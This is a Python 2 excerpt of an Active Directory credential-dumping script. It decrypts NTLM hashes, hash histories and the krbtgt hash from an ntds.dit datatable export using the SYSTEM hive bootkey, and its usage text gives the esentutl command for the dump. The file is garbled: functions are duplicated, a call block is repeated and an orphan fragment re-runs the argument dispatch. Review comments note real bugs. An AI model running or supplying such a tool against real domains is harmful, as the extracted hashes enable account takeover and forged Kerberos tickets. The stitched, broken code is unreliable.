def decKrbtgt(hiveFile, hashFile):
    """Print the decrypted krbtgt entry found in an esentutl datatable dump.

    hiveFile -- path to the SYSTEM hive; handed to get_syskey() (defined
                elsewhere in the file) to obtain the bootkey.
    hashFile -- text dump of the ntds.dit datatable: one ``ATTxxx: value``
                line per column, records delimited by the ATTm3 column.

    Only three columns are read: ATTk590689 (kept as rawPekKey), and, from
    the record whose name reprs as ``u'krbtgt'``, ATTr589970 (rawRID) and
    ATTk589914 (rawNTLMhash). The result of decUserHash() is printed; that
    helper is not defined in this excerpt. If the dump contains no krbtgt
    record, rawRID and rawNTLMhash remain None and are passed on unchecked.
    """

    #get the bootkey from the system hive
    bootkey = get_syskey(hiveFile)

    # The entire dump is read into memory. The handle is closed manually
    # rather than with a ``with`` block, so an exception in read() leaks it.
    f = open(hashFile)
    raw = f.read()
    f.close()

    krbtgt_acct = None  # assigned here but never read
    rawPekKey = None
    rawRID = None
    rawNTLMhash = None

    # split along account boundaries
    accts = raw.split("ATTm3")

    for acct in accts:
        if "ATTk590689" in acct:
            # Value is the text after the first ':' with surrounding
            # whitespace and single quotes stripped; a line without ':'
            # would raise IndexError. Last occurrence wins.
            for part in acct.split('\n'):
                if part.startswith("ATTk590689"):
                    rawPekKey = part.split(":")[1].strip().strip('\'')

        # krbtgt record, matched on the unicode repr of its name
        elif "u\'krbtgt\'" in acct and "ATTk589914" in acct:

            for part in acct.split('\n'):

                if part.startswith("ATTr589970"):
                    rawRID = part.split(":")[1].strip().strip('\'')

                elif part.startswith("ATTk589914"):
                    rawNTLMhash = part.split(":")[1].strip().strip('\'')

    # NOTE(review): six arguments here, but the ``len(sys.argv) == 5`` branch
    # of the script calls decUserHash() with five; the helper's signature is
    # not visible in this excerpt, so one of the two call sites is suspect.
    # The empty string is presumably an unused LM-hash slot -- confirm.
    print decUserHash(bootkey, rawPekKey, "krbtgt", rawRID, "", rawNTLMhash)
def decKrbtgt(hiveFile,hashFile):
    """Print the decrypted krbtgt entry found in an esentutl datatable dump.

    hiveFile -- path to the SYSTEM hive; handed to get_syskey() (defined
                elsewhere in the file) to obtain the bootkey.
    hashFile -- text dump of the ntds.dit datatable: one ``ATTxxx: value``
                line per column, records delimited by the ATTm3 column.

    Reads ATTk590689 (rawPekKey) and, from the record whose name reprs as
    ``u'krbtgt'``, ATTr589970 (rawRID) and ATTk589914 (rawNTLMhash), then
    prints whatever decUserHash() returns. When no krbtgt record is present
    rawRID and rawNTLMhash stay None and are passed through unchecked.
    """

    #get the bootkey from the system hive
    bootkey = get_syskey(hiveFile)

    # Whole dump read into memory; not using ``with``, so an exception in
    # read() leaves the handle open.
    f = open(hashFile)
    raw = f.read()
    f.close()

    krbtgt_acct = None  # never read
    rawPekKey = None
    rawRID = None
    rawNTLMhash = None

    # split along account boundaries
    accts = raw.split("ATTm3")

    for acct in accts:
        if "ATTk590689" in acct:
            # text after the first ':' with whitespace/quotes stripped;
            # a matching line without ':' raises IndexError; last one wins
            for part in acct.split('\n'):
                if part.startswith("ATTk590689"):
                    rawPekKey = part.split(":")[1].strip().strip('\'')

        # krbtgt record, matched on the unicode repr of its name
        elif "u\'krbtgt\'" in acct and "ATTk589914" in acct:

            for part in acct.split('\n'):

                if part.startswith("ATTr589970"):
                    rawRID = part.split(":")[1].strip().strip('\'')

                elif part.startswith("ATTk589914"): 
                    rawNTLMhash = part.split(":")[1].strip().strip('\'')

    # NOTE(review): six arguments here versus five in the script's
    # ``len(sys.argv) == 5`` branch; decUserHash()'s signature is not in this
    # excerpt, so one of the call sites is likely wrong -- confirm.
    print decUserHash(bootkey, rawPekKey, "krbtgt", rawRID, "", rawNTLMhash)
def decUserHashHistories(hiveFile, hashFile):
    """Print the decrypted hash history of every record carrying ATTk589918.

    hiveFile -- path to the SYSTEM hive, passed to get_syskey() for the bootkey.
    hashFile -- text dump of the ntds.dit datatable (``ATTxxx: value`` lines,
                records delimited by ATTm3).

    For each record containing ATTk589918, the name (ATTm590045), RID
    (ATTr589970), ATTk589984 and ATTk589918 columns are extracted and passed
    to decUserHashHistory(), which is defined elsewhere in the file; each
    element of its result is printed on its own line.

    Caveats visible in the code below: ``name`` is only bound when an
    ATTm590045 line is seen, so a record without one raises NameError (first
    record) or reuses the previous record's name; rawRID and the two history
    values are likewise initialised once and carry over between records when
    a column is absent; and rawPekKey is whatever ATTk590689 record was seen
    last, regardless of its position relative to the account records.
    """

    #get the bootkey from the system hive
    bootkey = get_syskey(hiveFile)

    # whole dump read into memory; closed manually, not via ``with``
    f = open(hashFile)
    raw = f.read()
    f.close()

    krbtgt_acct = None  # never read
    rawPekKey = None
    rawRID = None
    rawNTLMhash = None  # never read
    rawLMhash = None  # never read
    rawNTLMhashHistory = None
    rawLMhashHistory = None

    # split along account boundaries
    accts = raw.split("ATTm3")

    for acct in accts:
        if "ATTk590689" in acct:
            # value after the first ':', whitespace and quotes stripped
            for part in acct.split('\n'):
                if part.startswith("ATTk590689"):
                    rawPekKey = part.split(":")[1].strip().strip('\'')

        # only examine accts with a valid NTLM hash history
        elif "ATTk589918" in acct:

            parts = acct.split('\n')

            for part in parts:
                if part.startswith("ATTm590045"):
                    # [1:] presumably drops the ``u`` of a ``u'...'`` repr
                    # (consistent with the ``u'krbtgt'`` match used elsewhere
                    # in the file) before the quotes are stripped -- confirm
                    name = part.split(":")[1].strip()[1:].strip('\'')
                elif part.startswith("ATTr589970"):
                    rawRID = part.split(":")[1].strip().strip('\'')
                elif part.startswith("ATTk589984"):
                    rawLMhashHistory = part.split(":")[1].strip().strip('\'')
                elif part.startswith("ATTk589918"):
                    rawNTLMhashHistory = part.split(":")[1].strip().strip('\'')

            # rawPekKey may still be None here if the PEK record has not been
            # encountered yet; nothing checks for that before the call
            histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID,
                                           rawLMhashHistory,
                                           rawNTLMhashHistory)
            for history in histories:
                print history
def decUserHashHistories(hiveFile,hashFile):
    """Print the decrypted hash history of every record carrying ATTk589918.

    hiveFile -- path to the SYSTEM hive, passed to get_syskey() for the bootkey.
    hashFile -- text dump of the ntds.dit datatable (``ATTxxx: value`` lines,
                records delimited by ATTm3).

    Each record containing ATTk589918 contributes its ATTm590045 (name),
    ATTr589970 (RID), ATTk589984 and ATTk589918 values to a call of
    decUserHashHistory() (defined elsewhere in the file); every element of
    the returned iterable is printed on its own line.

    Caveats visible below: ``name`` is bound only when an ATTm590045 line is
    seen, so a record lacking it raises NameError on the first record or
    reuses the previous name; rawRID and both history values are initialised
    once and carry over when a column is absent; rawPekKey is the last
    ATTk590689 value seen and may still be None when the first account record
    is processed.
    """

    #get the bootkey from the system hive
    bootkey = get_syskey(hiveFile)

    # whole dump read into memory; closed manually rather than via ``with``
    f = open(hashFile)
    raw = f.read()
    f.close()

    krbtgt_acct = None  # never read
    rawPekKey = None
    rawRID = None
    rawNTLMhash = None  # never read
    rawLMhash = None  # never read
    rawNTLMhashHistory = None
    rawLMhashHistory = None

    # split along account boundaries
    accts = raw.split("ATTm3")

    for acct in accts:
        if "ATTk590689" in acct:
            # value after the first ':', whitespace and quotes stripped
            for part in acct.split('\n'):
                if part.startswith("ATTk590689"):
                    rawPekKey = part.split(":")[1].strip().strip('\'')

        # only examine accts with a valid NTLM hash history
        elif "ATTk589918" in acct:

            parts = acct.split('\n')

            for part in parts:
                if part.startswith("ATTm590045"):
                    # [1:] presumably drops the ``u`` of a ``u'...'`` repr
                    # before the quotes are stripped -- confirm
                    name = part.split(":")[1].strip()[1:].strip('\'')
                elif part.startswith("ATTr589970"):
                    rawRID = part.split(":")[1].strip().strip('\'')
                elif part.startswith("ATTk589984"):
                    rawLMhashHistory = part.split(":")[1].strip().strip('\'')
                elif part.startswith("ATTk589918"): 
                    rawNTLMhashHistory = part.split(":")[1].strip().strip('\'')

            # no None-check on rawPekKey or name before the call
            histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID, rawLMhashHistory, rawNTLMhashHistory)
            for history in histories:
                print history
            histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID,
                                           rawLMhashHistory,
                                           rawNTLMhashHistory)
            for history in histories:
                print history


# Command-line dispatch keyed purely on argv length (no argparse); ``sys`` is
# presumably imported earlier in the file, outside this excerpt.
if len(sys.argv) == 3:
    # <system hive> <hash file>; decUserHashes is not defined in this excerpt
    decUserHashes(sys.argv[1], sys.argv[2])

elif len(sys.argv) == 4:
    # The usage text below advertises "-krbtgt", but any third argument other
    # than "-history" (compared case-insensitively) takes the krbtgt branch.
    if (sys.argv[3].lower() == "-history"):
        decUserHashHistories(sys.argv[1], sys.argv[2])
    else:
        decKrbtgt(sys.argv[1], sys.argv[2])

elif len(sys.argv) == 5:
    bootkey = get_syskey(sys.argv[1])
    # BUG: ``bootkey`` is assigned above but ``bootKey`` is read here, so this
    # branch raises NameError unless a module-level ``bootKey`` exists outside
    # this excerpt. It also passes five arguments where decKrbtgt() passes six
    # to the same helper.
    decUserHash(bootKey, sys.argv[2], "user", sys.argv[3], sys.argv[4])

else:
    # usage text; exits with status 1 for any other argument count
    print "\nFirst dump the datatable using esentutl.py:"
    print "\tesentutl.py /path/to/ntds.dit export -table datatable | grep -E \"ATTk590689|ATTm3|ATTm590045|ATTm590045|ATTr589970|ATTk589914|ATTk589879|ATTk589984|ATTk589918\" > outfile.txt\n"
    print "Then       : %s <system hive> <hash file>" % sys.argv[0]
    print "\tor : %s <system hive> <hash file> -krbtgt" % sys.argv[0]
    print "\tor : %s <system hive> <hash file> -history" % sys.argv[0]
    print "\tor : %s <system hive> <rawPekKey> <rawRid> <rawNTLMhash>\n" % sys.argv[
        0]
    sys.exit(1)
                    rawNTLMhashHistory = part.split(":")[1].strip().strip('\'')

            histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID, rawLMhashHistory, rawNTLMhashHistory)
            for history in histories:
                print history


# Command-line dispatch keyed purely on argv length (no argparse); ``sys`` is
# presumably imported earlier in the file, outside this excerpt.
if len(sys.argv) == 3:
    # <system hive> <hash file>; decUserHashes is not defined in this excerpt
    decUserHashes(sys.argv[1], sys.argv[2])


elif len(sys.argv) == 4:
    # The usage text advertises "-krbtgt", but any third argument other than
    # "-history" (case-insensitive) is routed to decKrbtgt().
    if (sys.argv[3].lower() == "-history"):
        decUserHashHistories(sys.argv[1], sys.argv[2])
    else:
        decKrbtgt(sys.argv[1], sys.argv[2])


elif len(sys.argv) == 5:
    bootkey = get_syskey(sys.argv[1])
    # BUG: assigns ``bootkey`` but reads ``bootKey`` -- NameError unless a
    # module-level ``bootKey`` exists outside this excerpt. Five arguments are
    # passed here versus six in decKrbtgt()'s call to the same helper.
    decUserHash(bootKey, sys.argv[2], "user", sys.argv[3], sys.argv[4])

else:
    # usage text; exit status 1 for any other argument count
    print "\nFirst dump the datatable using esentutl.py:"
    print "\tesentutl.py /path/to/ntds.dit export -table datatable | grep -E \"ATTk590689|ATTm3|ATTm590045|ATTm590045|ATTr589970|ATTk589914|ATTk589879|ATTk589984|ATTk589918\" > outfile.txt\n"
    print "Then       : %s <system hive> <hash file>" % sys.argv[0]
    print "\tor : %s <system hive> <hash file> -krbtgt" % sys.argv[0]
    print "\tor : %s <system hive> <hash file> -history" % sys.argv[0]
    print "\tor : %s <system hive> <rawPekKey> <rawRid> <rawNTLMhash>\n" % sys.argv[0]
    sys.exit(1)